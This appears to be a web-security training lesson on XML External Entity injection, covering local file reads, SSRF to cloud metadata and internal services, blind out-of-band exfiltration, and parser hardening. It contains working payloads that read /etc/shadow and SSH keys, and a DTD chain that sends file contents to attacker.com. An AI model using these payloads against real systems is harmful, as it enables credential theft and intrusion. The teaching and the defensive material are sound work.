XML External Entities (XXE)
Abusing XML parsers to read local files, perform SSRF, and exfiltrate data out-of-band.
XML is everywhere you do not expect it: SOAP web services, document upload features, SVG files, DOCX and XLSX files (which are ZIP archives containing XML), RSS feeds, configuration parsers, and API endpoints that accept both JSON and XML. Whenever an XML parser processes a document with external entity references enabled, the parser will go and fetch those references - from the local filesystem, from internal network URLs, or from attacker-controlled servers. This is XML External Entity injection (XXE), and it has been used to read /etc/passwd, expose AWS credentials, and trigger full SSRF from document parsers in otherwise well-secured applications.
Authorized Testing Only
XXE attacks can read arbitrary files from the server's filesystem (including private keys, credentials, and source code), perform internal network requests, and in some configurations achieve remote code execution. Only test XXE on systems you own or have explicit written authorization to test. Using XXE to exfiltrate data from a production system without permission is a serious crime under the CFAA and equivalent laws.
The XML External Entity Mechanism
XML supports a feature called a Document Type Definition (DTD), which can declare entities - essentially named constants that can be substituted into the XML document body. There are two kinds that matter for XXE:
Internal entity (harmless):
<!DOCTYPE foo [
<!ENTITY myname "Alice">
]>
<root>Hello, &myname;!</root>
The parser substitutes &myname; with "Alice". Completely benign.
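As a quick check of the substitution described above, the following sketch parses the same document with Python's standard xml.etree.ElementTree. The variable names are illustrative only.

```python
import xml.etree.ElementTree as ET

# Same document as above: an internal entity declared in the DTD
# and referenced once in the element body.
DOC = """<!DOCTYPE foo [
<!ENTITY myname "Alice">
]>
<root>Hello, &myname;!</root>"""

root = ET.fromstring(DOC)
greeting = root.text  # the parser has already replaced the entity reference
print(greeting)
```

The replacement happens inside the parser, so application code only ever sees the expanded text.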
External entity (the dangerous kind):
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
The SYSTEM keyword tells the parser to fetch the entity's value from an external resource. When the application returns the parsed XML or reflects the content of any element, the contents of /etc/passwd appear in the response. This is the entirety of the XXE read primitive.
Reading Local Files
The most immediate impact of XXE is arbitrary file read from the server's filesystem.
Basic Payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
If the application includes the value of data in its response, you receive /etc/passwd.
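To reproduce the read primitive safely in a lab, the sketch below points the basic payload at a throwaway file that the script creates itself, then parses it twice with Python's xml.sax: once with external general entities enabled (the vulnerable configuration) and once with them disabled. The helper names (TextCollector, build_payload, parse_text, demo) and the file contents are assumptions made for this illustration.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data the parser reports."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def build_payload(file_uri: str) -> bytes:
    """Return the basic payload with the entity pointing at file_uri."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE root [\n"
        f'<!ENTITY xxe SYSTEM "{file_uri}">\n'
        "]>\n"
        "<root><data>&xxe;</data></root>"
    ).encode("utf-8")


def parse_text(document: bytes, resolve_external: bool) -> str:
    """Parse the document and return the text the application would see."""
    parser = xml.sax.make_parser()
    # True reproduces the vulnerable configuration; False is the safe one.
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))
    return "".join(handler.chunks)


def demo() -> tuple:
    """Run both configurations against a temporary lab file."""
    with tempfile.TemporaryDirectory() as tmp:
        target = Path(tmp) / "lab-secret.txt"
        target.write_text("lab-secret-value", encoding="utf-8")
        payload = build_payload(target.as_uri())
        return parse_text(payload, True), parse_text(payload, False)
```

Calling demo() returns the text seen under each configuration; only the first should contain the file's contents.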
Common high-value files to target:
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "file:///etc/shadow">
<!ENTITY xxe SYSTEM "file:///etc/hosts">
<!ENTITY xxe SYSTEM "file:///proc/self/environ">
<!ENTITY xxe SYSTEM "file:///proc/self/cmdline">
<!ENTITY xxe SYSTEM "file:///home/www-data/.ssh/id_rsa">
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
<!ENTITY xxe SYSTEM "file:///app/config/database.yml">
<!ENTITY xxe SYSTEM "file:///etc/nginx/nginx.conf">
On Windows targets:
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY xxe SYSTEM "file:///C:/inetpub/wwwroot/web.config">
Reading PHP Source Code
file:// on PHP files returns the raw PHP code - no execution, just the source. This reveals database passwords, internal API keys, and other secrets embedded in the application:
<!ENTITY xxe SYSTEM "file:///var/www/html/includes/db.php">
You can also use the PHP filter wrapper to base64-encode the file content (useful when the file contains characters that break XML parsing):
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
Decode the base64 output to get the file content.
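Decoding can be done with any base64 tool; a minimal Python sketch follows. The function name decode_filter_output is hypothetical, and the whitespace stripping assumes the response may wrap or indent the encoded text.

```python
import base64


def decode_filter_output(encoded_text: str) -> str:
    """Decode base64 text copied out of the HTTP response."""
    # Responses often wrap or indent the value, so drop all whitespace first.
    cleaned = "".join(encoded_text.split())
    raw = base64.b64decode(cleaned)
    # Replace undecodable bytes instead of failing on binary content.
    return raw.decode("utf-8", errors="replace")
```

For example, passing the string copied from the data element returns the original PHP source as text.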
When file:// Breaks on Special Characters
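Files containing XML-reserved characters (less-than signs, ampersands) cause the XML parser to error, because the entity's replacement text is parsed as markup. Use the PHP filter, or wrap the content in CDATA: in an external DTD, declare parameter entities that expand to the CDATA opening and closing delimiters, then define a general entity whose value concatenates the opening delimiter, the file entity, and the closing delimiter. This has to happen in an external DTD because parameter entity references are not allowed inside entity values in the internal subset. CDATA wrapping handles markup characters in text files, but it is not binary-safe: it still fails on content containing ]]> or bytes that are not legal XML characters (such as NUL), so base64 encoding remains the more robust choice where it is available.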
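The CDATA wrapping described above can be sketched as two text templates: an external DTD and the document that loads it. The function names, the entity names (file, start, end, wrapped, dtd), and any URL passed in are assumptions for illustration, not fixed parts of the technique.

```python
def build_wrapper_dtd(file_uri: str) -> str:
    """Text of the external DTD that wraps the file in CDATA delimiters."""
    return (
        f'<!ENTITY % file SYSTEM "{file_uri}">\n'
        '<!ENTITY % start "<![CDATA[">\n'
        '<!ENTITY % end "]]>">\n'
        # Parameter entity references inside an entity value are only
        # permitted in the external subset, hence the separate DTD file.
        '<!ENTITY wrapped "%start;%file;%end;">\n'
    )


def build_document(dtd_url: str) -> str:
    """Text of the XML document that pulls in the external DTD."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE root [\n"
        f'<!ENTITY % dtd SYSTEM "{dtd_url}">\n'
        "%dtd;\n"
        "]>\n"
        "<root><data>&wrapped;</data></root>"
    )
```

When the parser expands &wrapped;, the file content sits inside a CDATA section, so less-than signs and ampersands in it are treated as literal text.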
SSRF via XXE
External entities can use http:// and https:// instead of file://, turning XXE into a full SSRF primitive. The parser fetches the URL on the server's behalf.
Internal Service Enumeration
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://localhost:6379/">
]>
<root><data>&xxe;</data></root>
Redis does not speak HTTP, so if the response or a parser error includes Redis protocol text (for example a line starting with -ERR), the internal Redis is confirmed. This gives you the same internal-network access described in the SSRF lesson.
AWS Cloud Metadata via XXE
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
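<root><data>&xxe;</data></root>
On instances that still allow IMDSv1, the parser fetches the AWS IMDS endpoint and returns the IAM role name. A second request, with the role name appended to the path, fetches the credentials. IMDSv2 requires a session token obtained with a PUT request, which an entity fetch cannot issue. This is the same cloud metadata attack as SSRF, triggered via XXE instead of a URL-fetch feature.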
Combining XXE and SSRF: Internal API Access
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://internal-api.corp/admin/users">
]>
<root><data>&xxe;</data></root>
The server-side XML parser makes the request with the server's internal network identity, bypassing any firewall rules that block your IP.
Finding XXE Injection Points
XXE requires the application to:
- Accept XML input (or input that gets converted to XML internally)
- Parse that XML with an XML parser
- Either reflect parsed content OR make out-of-band requests
Hunt for:
- Direct XML endpoints: SOAP/WSDL services, XML APIs, AJAX requests with Content-Type: application/xml or text/xml
- File upload features: DOCX, XLSX, ODT, SVG, PDF with embedded XML
- Content-Type switching: change application/json to application/xml and reformat the body as XML - some frameworks accept both
- Serialization endpoints: Java applications using JAXB, .NET with XmlSerializer, Python's xml.etree or lxml
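In Burp Suite, right-click any request and use "Change request method" as a quick test; converting the body to XML is typically done with an extension such as Content Type Converter rather than a built-in menu item. Burp Scanner's active scan includes checks for XML external entity injection on the insertion points it finds.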
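For the Content-Type switching test, the JSON body has to be re-expressed as XML. The sketch below handles only flat JSON objects and assumes a wrapper element named root; the element name a given framework expects is application-specific, so treat both the function name and the default as placeholders.

```python
import json
import xml.etree.ElementTree as ET


def json_body_to_xml(json_body: str, root_tag: str = "root") -> str:
    """Convert a flat JSON object into an equivalent XML body."""
    data = json.loads(json_body)
    root = ET.Element(root_tag)
    for key, value in data.items():
        # Each top-level key becomes a child element holding the value as text.
        child = ET.SubElement(root, key)
        child.text = str(value)
    return ET.tostring(root, encoding="unicode")
```

Resend the request with the converted body and Content-Type: application/xml; if the application still processes it, the endpoint is a candidate for the payloads in this lesson.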
Blind / Out-of-Band XXE Exfiltration
Often the application processes your XML but does not echo the entity content back in the response. This is blind XXE. Detection and exfiltration require out-of-band techniques.
Step 1: Confirm OOB Connectivity
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://your-collaborator.burpcollaborator.net/">
]>
<root><data>&xxe;</data></root>
If your Collaborator console receives a DNS lookup or HTTP request, the parser is resolving external entities.
Step 2: Exfiltrate Via External DTD
For data exfiltration from blind XXE, you need a two-step DTD trick. Host an external DTD file on your server (e.g., http://attacker.com/xxe.dtd):
<!ENTITY % file SYSTEM "file:///etc/passwd">
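<!-- &#x25; is the character reference for %; a bare % inside an entity value is a well-formedness error -->
<!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;
%send;
Then your payload references the external DTD: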
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/xxe.dtd">
%dtd;
]>
<foo/>
When the parser processes this:
- It fetches your external DTD.
- The DTD reads /etc/passwd into %file.
- The DTD builds a second entity that makes an HTTP request to your server with the file content as a query parameter.
- Your server receives the file content in the incoming request URL.
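This chain works because parameter entities (%name;) can be referenced inside other declarations, including entity values, when they appear in an external DTD. The XML specification forbids this in the internal subset, which is why the payload has to load a DTD from your server instead of declaring everything inline.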
OOB Exfiltration Limitations
The external DTD approach does not work when the file content contains certain characters (newlines, ampersands, less-than signs) that break the URL or the entity reference. The PHP filter base64-encode wrapper (php://filter/convert.base64-encode/resource=...) is the standard workaround: the file is base64-encoded before being embedded in the URL, so no special characters remain.
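On the receiving side, the base64 text arrives in the request line your server logs. The sketch below recovers the file bytes from such a request target; the function name and the data parameter name are assumptions that mirror the example DTD above.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfil_request(request_target: str, param: str = "data") -> bytes:
    """Recover file bytes from a logged request target such as /?data=..."""
    query = urlsplit(request_target).query
    values = parse_qs(query).get(param, [])
    if not values:
        raise ValueError(f"no {param!r} parameter in request target")
    # parse_qs turns '+' into a space, but '+' is a valid base64 character.
    encoded = values[0].replace(" ", "+")
    # Restore padding in case it was trimmed along the way.
    encoded += "=" * (-len(encoded) % 4)
    return base64.b64decode(encoded)
```

The plus-sign handling matters in practice: without it, any file whose encoding contains a plus sign decodes to corrupted output or fails outright.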
Step 3: Error-Based Exfiltration
Some parsers emit verbose error messages. If you can trigger a parse error that includes the file content, you get exfiltration through the error channel without needing an OOB connection. The technique involves declaring an entity that references a non-existent URI containing the file data:
<!ENTITY % file SYSTEM "file:///etc/passwd">
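<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
The parser tries to open file:///nonexistent/[contents of /etc/passwd], fails, and throws an error message that includes the path - which contains the file contents. Like the OOB chain, these declarations need to be served from an external DTD, because they reference a parameter entity inside an entity value.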
XXE in Less Obvious Places
SVG File Uploads
SVG is XML. A crafted SVG can contain an XXE payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
Upload this SVG to a platform that processes or renders SVG files server-side (e.g., converting to PNG, extracting text, rendering thumbnails). If the SVG parser has external entity processing enabled, the text element contains /etc/passwd when rendered.
DOCX / XLSX Files
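Office Open XML (.docx, .xlsx) files are ZIP archives containing XML files. Unzip the file, add a DOCTYPE with an external entity to word/document.xml (or another XML part the application reads), reference the entity in the body, re-zip, and upload. If the application parses the document XML, it processes the entity.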
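Because these formats are plain ZIP archives, they can be inspected with standard tooling. The sketch below lists which XML parts of an uploaded archive declare a DOCTYPE, which well-formed Office documents normally do not. The function name is hypothetical, and the byte-level check assumes ASCII-compatible encodings, so a UTF-16 part would slip past it.

```python
import io
import zipfile
from typing import List


def parts_declaring_doctype(archive_bytes: bytes) -> List[str]:
    """Return the names of XML parts in the archive that contain a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            # Only XML parts and relationship files are parsed as XML.
            if not name.lower().endswith((".xml", ".rels")):
                continue
            # A DOCTYPE must precede the root element, so the head is enough.
            head = archive.read(name)[:4096]
            if b"<!DOCTYPE" in head:
                flagged.append(name)
    return flagged
```

A check like this is useful for triage and logging, but it does not replace configuring the parser that ultimately reads the parts.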
SAML Authentication Assertions
SAML (Security Assertion Markup Language) uses signed XML documents for SSO. Because the XML has to be parsed before its signature can be checked, a parser that resolves external entities will process an XXE payload in an unsigned or invalidly signed SAML message before the signature check rejects it.
Prevention
1. Disable External Entity Processing (Primary Fix)
Every XML parser library has a way to disable external entities. This should be your first configuration step any time you use an XML parser.
Python (lxml):
from lxml import etree
# SECURE: disable external entities and DTD loading
parser = etree.XMLParser(
    no_network=True,
    resolve_entities=False,
    dtd_validation=False,
    load_dtd=False,
)
tree = etree.fromstring(xml_data, parser)
Python (defusedxml - the easy option):
import defusedxml.ElementTree as ET
# defusedxml raises on entity declarations and external references by default
tree = ET.fromstring(xml_data)
Java (DocumentBuilderFactory):
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
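dbf.setExpandEntityReferences(false);
PHP (libxml):
// PHP < 8.0 only: the function is deprecated as of PHP 8.0
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}
// PHP 8.0+ (libxml 2.9+): external entity loading is disabled by default.
// Never pass LIBXML_NOENT or LIBXML_DTDLOAD, which turn entity substitution and DTD loading back on.
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);
Use defusedxml in Python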
The defusedxml package wraps Python's standard XML libraries with secure defaults - it raises EntitiesForbidden and ExternalReferenceForbidden by default, and DTDForbidden when called with forbid_dtd=True. It is a near drop-in replacement for xml.etree.ElementTree that blocks XXE without any per-parser configuration.
2. Avoid DTD Processing Entirely
If your application does not use DTDs, disable DTD loading entirely. This is a stronger control than just disabling external entities - it blocks the entire entity declaration mechanism.
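One way to enforce this with only the Python standard library is to run a first pass with expat that aborts as soon as a DOCTYPE is seen, and build the tree only if that pass succeeds. This is a sketch under that assumption; DTDNotAllowed and parse_without_dtd are names invented for the example, and the approach is similar in spirit to what defusedxml does internally.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDNotAllowed(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this at the start of any DOCTYPE declaration.
    raise DTDNotAllowed(f"DOCTYPE declaration {name!r} is not permitted")


def parse_without_dtd(document: bytes) -> ET.Element:
    """Parse XML, refusing any document that declares a DTD."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    # First pass: well-formedness check that stops at the first DOCTYPE.
    checker.Parse(document, True)
    # Second pass: build the element tree from the vetted document.
    return ET.fromstring(document)
```

Because the rejection happens inside the parser rather than on the raw string, it is not affected by the document's character encoding.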
3. Use a Modern Serialization Format
If you control the interface, prefer JSON over XML for API design. JSON has no entity mechanism, no DTD, and no external reference capability. This eliminates the XXE surface entirely.
4. Input Validation (Defense in Depth)
Reject input that contains <!DOCTYPE or <!ENTITY declarations if your application does not require DTDs. A simple pre-parse string check will catch most off-the-shelf XXE payloads:
def validate_no_dtd(xml_string: str) -> None:
    if '<!DOCTYPE' in xml_string or '<!ENTITY' in xml_string:
        raise ValueError("DTD/Entity declarations are not permitted")
This is defense-in-depth, not a replacement for disabling external entities in the parser itself.
5. Patch XML Parser Libraries
Parser libraries have had bugs where XXE features were enabled by default or where security configurations could be bypassed. Keep all XML parsing libraries current.
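Since defaults can change between library versions, it may help to keep a regression check in the test suite that fails if the parser you use ever starts expanding external entities. The sketch below is one possible shape for such a check; resists_xxe and the canary string are hypothetical, and parse stands for whatever parsing function the application actually calls.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

CANARY = "XXE-CANARY-7f3a"


def resists_xxe(parse) -> bool:
    """Return True if parse() does not leak a local file via an external entity."""
    with tempfile.TemporaryDirectory() as tmp:
        canary_file = Path(tmp) / "canary.txt"
        canary_file.write_text(CANARY, encoding="utf-8")
        document = (
            f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "{canary_file.as_uri()}">]>'
            "<r>&xxe;</r>"
        )
        try:
            root = parse(document)
        except Exception:
            # Refusing to parse the document counts as safe.
            return True
        # Parsed without error: safe only if the file content is absent.
        return CANARY not in "".join(root.itertext())
```

For example, resists_xxe(ET.fromstring) exercises the standard library parser; swap in the application's own parsing function to cover its real configuration.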
Key Takeaways
- XXE exploits the XML external entity mechanism to have the server fetch content from file://, http://, or https:// URIs declared in the XML DTD.
- The primary impacts are arbitrary local file read (credentials, private keys, source code), SSRF to internal services, and cloud metadata exfiltration.
- Blind XXE is confirmed via out-of-band DNS/HTTP callbacks and exfiltrated using external DTD parameter entity chains or error-based techniques.
- XXE lurks in SVG uploads, DOCX/XLSX parsers, SAML assertions, and any XML API endpoint.
- Fix: disable external entity processing and DTD loading in the XML parser - use defusedxml in Python, explicit setFeature calls in Java, and prefer JSON over XML for new interfaces.